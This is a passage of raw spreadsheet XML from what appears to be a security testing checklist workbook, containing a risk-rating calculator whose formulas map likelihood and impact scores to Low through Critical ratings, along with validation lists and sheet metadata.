      <c r="C24" s="13" t="str">
        <f>IF(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="D24" s="14" t="str">
        <f>IF(AND($B16&lt;3,$G16&gt;=6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="F24" s="15"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="11" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="B25" s="13" t="str">
        <f>IF(AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3),"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="C25" s="14" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="D25" s="16" t="str">
        <f>IF(AND($B16&gt;=3,$B16&lt;6,$G16&gt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="F25" s="15"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="11" t="str">
        <f>IF($B16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="B26" s="14" t="str">
        <f>IF(AND($B16&gt;=6,$G16&lt;3),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>Moderate</v>
      </c>
      <c r="C26" s="16" t="str">
        <f>IF(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="D26" s="17" t="str">
        <f>IF(AND($B$16&gt;=6,$G$16&gt;=6),"-&gt;Critical&lt;-","Critical")</f>
        <v>Critical</v>
      </c>
    </row>
  </sheetData>
  <dataConsolidate function="varp"/>
  <mergeCells count="22">
    <mergeCell ref="B5:D5"/>
    <mergeCell ref="B16:D17"/>
    <mergeCell ref="G16:G17"/>
    <mergeCell ref="A1:G1"/>
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="F3:G3"/>
    <mergeCell ref="A4:D4"/>
    <mergeCell ref="F4:G4"/>
    <mergeCell ref="A16:A17"/>
    <mergeCell ref="F16:F17"/>
    <mergeCell ref="B6:D6"/>
    <mergeCell ref="B7:D7"/>
    <mergeCell ref="B8:D8"/>
    <mergeCell ref="A10:D10"/>
    <mergeCell ref="F10:G10"/>
    <mergeCell ref="B11:D11"/>
    <mergeCell ref="B20:D20"/>
    <mergeCell ref="E20:F20"/>
    <mergeCell ref="B22:D22"/>
    <mergeCell ref="B12:D12"/>
    <mergeCell ref="B13:D13"/>
    <mergeCell ref="B14:D14"/>
  </mergeCells>
  <phoneticPr fontId="5" type="noConversion"/>
  <conditionalFormatting sqref="E20:F20">
    <cfRule type="containsText" dxfId="10" priority="7" operator="containsText" text="critical">
      <formula>NOT(ISERROR(SEARCH("critical",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="9" priority="8" operator="containsText" text="high">
      <formula>NOT(ISERROR(SEARCH("high",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="8" priority="9" operator="containsText" text="moderate">
      <formula>NOT(ISERROR(SEARCH("moderate",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="7" priority="10" operator="containsText" text="low">
      <formula>NOT(ISERROR(SEARCH("low",E20)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="6" priority="11" operator="containsText" text="Note">
      <formula>NOT(ISERROR(SEARCH("Note",E20)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A24:A26 B23:D23">
    <cfRule type="containsText" dxfId="5" priority="6" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:D26 A24:A26">
    <cfRule type="containsText" dxfId="4" priority="5" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",A23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C26">
    <cfRule type="containsText" dxfId="3" priority="4" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",C26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D25">
    <cfRule type="containsText" dxfId="2" priority="3" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",D25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C25">
    <cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",C25)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B26">
    <cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text="&lt;">
      <formula>NOT(ISERROR(SEARCH("&lt;",B26)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="16">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B5">
      <formula1>SkillRequired</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B6:D6">
      <formula1>Motive</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B7:D7">
      <formula1>Opportunity</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B8:D9">
      <formula1>PopulationSize</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G5">
      <formula1>LossofConfidentiality</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G6">
      <formula1>LossofIntegrity</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G7">
      <formula1>LossofAvailability</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G8:G9">
      <formula1>LossofAccountability</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B11:D11">
      <formula1>EasyofDiscovery</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B12:D12">
      <formula1>EaseofExploit</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B13:D13">
      <formula1>Awareness</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B14:D14">
      <formula1>IntrusionDetection</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G11">
      <formula1>FinancialDamage</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G12">
      <formula1>ReputationDamage</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G13">
      <formula1>NonCompliance</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="G14">
      <formula1>PolicyViolation</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9"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topLeftCell="A2" workbookViewId="0">
      <selection activeCell="N12" sqref="N12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="39" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="2" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="32.7109375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="2" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="43.28515625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="2" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="38.42578125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="2" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="38.42578125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="2" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="27.7109375" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="2" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="23" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="2" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="31.42578125" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="2" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="15" x14ac:dyDescent="0.2">
      <c r="A1" s="18" t="s">
        <v>15</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="18" t="s">
        <v>18</v>
      </c>
      <c r="D1" s="7"/>
      <c r="E1" s="18" t="s">
        <v>22</v>
      </c>
      <c r="F1" s="7"/>
      <c r="G1" s="18" t="s">
        <v>26</v>
      </c>
      <c r="H1" s="7"/>
      <c r="I1" s="18" t="s">
        <v>32</v>
      </c>
      <c r="J1" s="7"/>
      <c r="K1" s="18" t="s">
        <v>36</v>
      </c>
      <c r="L1" s="7"/>
      <c r="M1" s="18" t="s">
        <v>39</v>
      </c>
      <c r="N1" s="7"/>
      <c r="O1" s="18" t="s">
        <v>43</v>
      </c>
      <c r="P1" s="7"/>
    </row>
    <row r="2" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="B2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="C2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="D2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="G2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="H2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="I2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="J2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="K2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="L2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="M2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="N2" s="7" t="s">
        <v>53</v>
      </c>
      <c r="O2" s="7" t="s">
        <v>52</v>
      </c>
      <c r="P2" s="7" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="3" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="B3" s="7">
        <v>0</v>
      </c>
      <c r="C3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="D3" s="7">
        <v>0</v>
      </c>
      <c r="E3" s="7" t="s">
        <v>55</v>
      </c>
      <c r="F3" s="7">
        <v>0</v>
      </c>
      <c r="G3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="H3" s="7">
        <v>0</v>
      </c>
      <c r="I3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="J3" s="7">
        <v>0</v>
      </c>
      <c r="K3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="L3" s="7">
        <v>0</v>
      </c>
      <c r="M3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="N3" s="7">
        <v>0</v>
      </c>
      <c r="O3" s="7" t="s">
        <v>54</v>
      </c>
      <c r="P3" s="7">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A4" s="7" t="s">
        <v>458</v>
      </c>
      <c r="B4" s="7">
        <v>1</v>
      </c>
      <c r="C4" s="7" t="s">
        <v>19</v>
      </c>
      <c r="D4" s="7">
        <v>1</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>56</v>
      </c>
      <c r="F4" s="7">
        <v>4</v>
      </c>
      <c r="G4" s="7" t="s">
        <v>27</v>
      </c>
      <c r="H4" s="7">
        <v>2</v>
      </c>
      <c r="I4" s="7" t="s">
        <v>57</v>
      </c>
      <c r="J4" s="7">
        <v>1</v>
      </c>
      <c r="K4" s="7" t="s">
        <v>58</v>
      </c>
      <c r="L4" s="7">
        <v>1</v>
      </c>
      <c r="M4" s="7" t="s">
        <v>40</v>
      </c>
      <c r="N4" s="7">
        <v>1</v>
      </c>
      <c r="O4" s="7" t="s">
        <v>44</v>
      </c>
      <c r="P4" s="7">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A5" s="7" t="s">
        <v>459</v>
      </c>
      <c r="B5" s="7">
        <v>3</v>
      </c>
      <c r="C5" s="7" t="s">
        <v>59</v>
      </c>
      <c r="D5" s="7">
        <v>4</v>
      </c>
      <c r="E5" s="7" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="7">
        <v>7</v>
      </c>
      <c r="G5" s="7" t="s">
        <v>60</v>
      </c>
      <c r="H5" s="7">
        <v>4</v>
      </c>
      <c r="I5" s="7" t="s">
        <v>33</v>
      </c>
      <c r="J5" s="7">
        <v>3</v>
      </c>
      <c r="K5" s="7" t="s">
        <v>33</v>
      </c>
      <c r="L5" s="7">
        <v>3</v>
      </c>
      <c r="M5" s="7" t="s">
        <v>61</v>
      </c>
      <c r="N5" s="7">
        <v>4</v>
      </c>
      <c r="O5" s="7" t="s">
        <v>62</v>
      </c>
      <c r="P5" s="7">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A6" s="7" t="s">
        <v>460</v>
      </c>
      <c r="B6" s="7">
        <v>5</v>
      </c>
      <c r="C6" s="7" t="s">
        <v>63</v>
      </c>
      <c r="D6" s="7">
        <v>9</v>
      </c>
      <c r="E6" s="7" t="s">
        <v>64</v>
      </c>
      <c r="F6" s="7">
        <v>9</v>
      </c>
      <c r="G6" s="7" t="s">
        <v>65</v>
      </c>
      <c r="H6" s="7">
        <v>5</v>
      </c>
      <c r="I6" s="7" t="s">
        <v>66</v>
      </c>
      <c r="J6" s="7">
        <v>7</v>
      </c>
      <c r="K6" s="7" t="s">
        <v>67</v>
      </c>
      <c r="L6" s="7">
        <v>5</v>
      </c>
      <c r="M6" s="7" t="s">
        <v>68</v>
      </c>
      <c r="N6" s="7">
        <v>6</v>
      </c>
      <c r="O6" s="7" t="s">
        <v>69</v>
      </c>
      <c r="P6" s="7">
        <v>8</v>
      </c>
    </row>
    <row r="7" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A7" s="7" t="s">
        <v>461</v>
      </c>
      <c r="B7" s="7">
        <v>6</v>
      </c>
      <c r="C7" s="7"/>
      <c r="D7" s="7"/>
      <c r="E7" s="7"/>
      <c r="F7" s="7"/>
      <c r="G7" s="7" t="s">
        <v>70</v>
      </c>
      <c r="H7" s="7">
        <v>6</v>
      </c>
      <c r="I7" s="7" t="s">
        <v>71</v>
      </c>
      <c r="J7" s="7">
        <v>9</v>
      </c>
      <c r="K7" s="7" t="s">
        <v>71</v>
      </c>
      <c r="L7" s="7">
        <v>9</v>
      </c>
      <c r="M7" s="7" t="s">
        <v>463</v>
      </c>
      <c r="N7" s="7">
        <v>9</v>
      </c>
      <c r="O7" s="7" t="s">
        <v>72</v>
      </c>
      <c r="P7" s="7">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A8" s="7" t="s">
        <v>462</v>
      </c>
      <c r="B8" s="7">
        <v>9</v>
      </c>
      <c r="C8" s="7"/>
      <c r="D8" s="7"/>
      <c r="E8" s="7"/>
      <c r="F8" s="7"/>
      <c r="G8" s="7" t="s">
        <v>73</v>
      </c>
      <c r="H8" s="7">
        <v>9</v>
      </c>
      <c r="I8" s="7"/>
      <c r="J8" s="7"/>
      <c r="K8" s="7"/>
      <c r="L8" s="7"/>
      <c r="M8" s="7"/>
      <c r="N8" s="7"/>
      <c r="O8" s="7"/>
      <c r="P8" s="7"/>
    </row>
    <row r="10" spans="1:16" ht="15" x14ac:dyDescent="0.25">
      <c r="A10" s="18" t="s">
        <v>16</v>
      </c>
      <c r="B10" s="18"/>
      <c r="C10" s="18" t="s">
        <v>20</v>
      </c>
      <c r="D10" s="18"/>
      <c r="E10" s="18" t="s">
        <v>24</v>
      </c>
      <c r="F10" s="18"/>
      <c r="G10" s="18" t="s">
        <v>28</v>
      </c>
      <c r="H10" s="18"/>
      <c r="I10" s="18" t="s">
        <v>34</v>
      </c>
      <c r="J10" s="18"/>
      <c r="K10" s="18" t="s">
        <v>37</v>
      </c>
      <c r="L10" s="18"/>
      <c r="M10" s="18" t="s">
        <v>41</v>
      </c>
      <c r="N10" s="18"/>
      <c r="O10" s="18" t="s">
        <v>45</v>
      </c>
      <c r="P10" s="9"/>
    </row>
    <row r="11" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="B11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="C11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="D11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="E11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="F11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="G11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="H11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="I11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="J11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="K11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="L11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="M11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="N11" s="7" t="s">
        <v>53</v>
      </c>
      <c r="O11" s="7" t="s">
        <v>52</v>
      </c>
      <c r="P11" s="7" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="12" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="B12" s="7">
        <v>0</v>
      </c>
      <c r="C12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="D12" s="7">
        <v>0</v>
      </c>
      <c r="E12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="F12" s="7">
        <v>0</v>
      </c>
      <c r="G12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="H12" s="7">
        <v>0</v>
      </c>
      <c r="I12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="J12" s="7">
        <v>0</v>
      </c>
      <c r="K12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="L12" s="7">
        <v>0</v>
      </c>
      <c r="M12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="N12" s="7">
        <v>0</v>
      </c>
      <c r="O12" s="7" t="s">
        <v>54</v>
      </c>
      <c r="P12" s="7">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A13" s="7" t="s">
        <v>74</v>
      </c>
      <c r="B13" s="7">
        <v>2</v>
      </c>
      <c r="C13" s="7" t="s">
        <v>75</v>
      </c>
      <c r="D13" s="7">
        <v>1</v>
      </c>
      <c r="E13" s="7" t="s">
        <v>76</v>
      </c>
      <c r="F13" s="7">
        <v>1</v>
      </c>
      <c r="G13" s="7" t="s">
        <v>77</v>
      </c>
      <c r="H13" s="7">
        <v>1</v>
      </c>
      <c r="I13" s="7" t="s">
        <v>78</v>
      </c>
      <c r="J13" s="7">
        <v>1</v>
      </c>
      <c r="K13" s="7" t="s">
        <v>79</v>
      </c>
      <c r="L13" s="7">
        <v>1</v>
      </c>
      <c r="M13" s="7" t="s">
        <v>80</v>
      </c>
      <c r="N13" s="7">
        <v>2</v>
      </c>
      <c r="O13" s="7" t="s">
        <v>81</v>
      </c>
      <c r="P13">
        <v>3</v>
      </c>
    </row>
    <row r="14" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A14" s="7" t="s">
        <v>17</v>
      </c>
      <c r="B14" s="7">
        <v>6</v>
      </c>
      <c r="C14" s="7" t="s">
        <v>82</v>
      </c>
      <c r="D14" s="7">
        <v>3</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F14" s="7">
        <v>5</v>
      </c>
      <c r="G14" s="7" t="s">
        <v>83</v>
      </c>
      <c r="H14" s="7">
        <v>7</v>
      </c>
      <c r="I14" s="7" t="s">
        <v>84</v>
      </c>
      <c r="J14" s="7">
        <v>3</v>
      </c>
      <c r="K14" s="7" t="s">
        <v>85</v>
      </c>
      <c r="L14" s="7">
        <v>4</v>
      </c>
      <c r="M14" s="7" t="s">
        <v>86</v>
      </c>
      <c r="N14" s="7">
        <v>5</v>
      </c>
      <c r="O14" s="7" t="s">
        <v>87</v>
      </c>
      <c r="P14">
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A15" s="7" t="s">
        <v>88</v>
      </c>
      <c r="B15" s="7">
        <v>7</v>
      </c>
      <c r="C15" s="7" t="s">
        <v>89</v>
      </c>
      <c r="D15" s="7">
        <v>5</v>
      </c>
      <c r="E15" s="7" t="s">
        <v>90</v>
      </c>
      <c r="F15" s="7">
        <v>7</v>
      </c>
      <c r="G15" s="7" t="s">
        <v>29</v>
      </c>
      <c r="H15" s="7">
        <v>9</v>
      </c>
      <c r="I15" s="7" t="s">
        <v>91</v>
      </c>
      <c r="J15" s="7">
        <v>7</v>
      </c>
      <c r="K15" s="7" t="s">
        <v>92</v>
      </c>
      <c r="L15" s="7">
        <v>5</v>
      </c>
      <c r="M15" s="7" t="s">
        <v>42</v>
      </c>
      <c r="N15" s="7">
        <v>7</v>
      </c>
      <c r="O15" s="7" t="s">
        <v>46</v>
      </c>
      <c r="P15">
        <v>7</v>
      </c>
    </row>
    <row r="16" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A16" s="7" t="s">
        <v>93</v>
      </c>
      <c r="B16" s="7">
        <v>9</v>
      </c>
      <c r="C16" s="7" t="s">
        <v>21</v>
      </c>
      <c r="D16" s="7">
        <v>7</v>
      </c>
      <c r="E16" s="7" t="s">
        <v>94</v>
      </c>
      <c r="F16" s="7">
        <v>9</v>
      </c>
      <c r="G16" s="7"/>
      <c r="H16" s="7"/>
      <c r="I16" s="7" t="s">
        <v>35</v>
      </c>
      <c r="J16" s="7">
        <v>9</v>
      </c>
      <c r="K16" s="7" t="s">
        <v>38</v>
      </c>
      <c r="L16" s="7">
        <v>9</v>
      </c>
      <c r="M16" s="7"/>
      <c r="N16" s="7"/>
      <c r="O16" s="7" t="s">
        <v>95</v>
      </c>
      <c r="P16">
        <v>9</v>
      </c>
    </row>
    <row r="17" spans="1:15" x14ac:dyDescent="0.2">
      <c r="A17" s="7"/>
      <c r="B17" s="7"/>
      <c r="C17" s="7" t="s">
        <v>96</v>
      </c>
      <c r="D17" s="7">
        <v>9</v>
      </c>
      <c r="E17" s="7"/>
      <c r="F17" s="7"/>
      <c r="G17" s="7"/>
      <c r="H17" s="7"/>
      <c r="I17" s="7"/>
      <c r="J17" s="7"/>
      <c r="K17" s="7"/>
      <c r="L17" s="7"/>
      <c r="M17" s="7"/>
      <c r="N17" s="7"/>
      <c r="O17" s="7"/>
    </row>
  </sheetData>
  <phoneticPr fontId="5"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17</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="21" baseType="lpstr">
      <vt:lpstr>Testing Checklist</vt:lpstr>
      <vt:lpstr>Summary Findings</vt:lpstr>
      <vt:lpstr>Risk Assessment Calculator</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Awareness</vt:lpstr>
      <vt:lpstr>EaseofExploit</vt:lpstr>
      <vt:lpstr>EasyofDiscovery</vt:lpstr>
      <vt:lpstr>FinancialDamage</vt:lpstr>
      <vt:lpstr>IntrusionDetection</vt:lpstr>
      <vt:lpstr>LossofAccountability</vt:lpstr>
      <vt:lpstr>LossofAvailability</vt:lpstr>
      <vt:lpstr>LossofConfidentiality</vt:lpstr>
      <vt:lpstr>LossofIntegrity</vt:lpstr>
      <vt:lpstr>Motive</vt:lpstr>
      <vt:lpstr>NonCompliance</vt:lpstr>
      <vt:lpstr>Opportunity</vt:lpstr>
      <vt:lpstr>PolicyViolation</vt:lpstr>
      <vt:lpstr>PopulationSize</vt:lpstr>
      <vt:lpstr>ReputationDamage</vt:lpstr>
      <vt:lpstr>result</vt:lpstr>
      <vt:lpstr>SkillRequired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UnBoxIT</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">1996-10-14T23:33:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-11T10:19:53Z</dcterms:modified>
</cp:coreProperties>
</file>